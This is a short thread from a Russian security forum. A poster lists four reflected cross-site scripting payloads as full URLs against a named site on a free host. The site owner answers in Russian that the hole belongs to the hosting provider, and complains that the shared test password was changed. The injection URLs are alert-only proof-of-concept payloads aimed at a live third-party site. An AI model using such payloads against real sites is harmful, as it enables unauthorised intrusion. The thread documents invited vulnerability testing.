ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Hello Truelamer,
Sorry that I speak only in English (Russian language is not yet installed on my pc ).
1. I found a XSS:
http://gena.x53.ru/cabinet.php?about_us=1'="><script>alert(/XSS-BY-LAEOT/)</script>
# it's on all pages! (....(something)="Here we place our bad code)).
2. Another XSS:
http://gena.x53.ru/cabinet.php?org_full=60="><script>alert(/XSS-BY-LAEOT/)</script>&active=1
3. XSS :
http://gena.x53.ru/index.php?cid=1'="><script>alert(/XSS-BY-LAEOT/)</script>&aid=1'&archive=1'
4.XSS:
http://gena.x53.ru/index.php?error=="><body onLoad=alert(/XSS-BY-LAEOT/)>
-------------------------------------------------
That's all what i've found.
And your login account doesn't work
But ok.. good luck with your site!

LAEOT

Извени разочарую, это не косяк на сайте, это косяк на хостинге. Все сайты на этом фри хосте уязвимы у них эта пассивная xss, я про это уже писал. Т.е. везде где есть параметры в скрипте есть xss и видно её только в експлорере. Вот....

Блин я зол! Я пароль от кабинета давал не чтоб его меняли а чтоб тестили. Как теперь другие туда попадут? Я только завтра его изменю через БД когда на работу приду. НУ ИМЕЙТЕ ЖЕ СОВЕСТЬ!

Oh.. I'm sorry,I didn't know about that
But i'll test it when you have reset the password tomorrow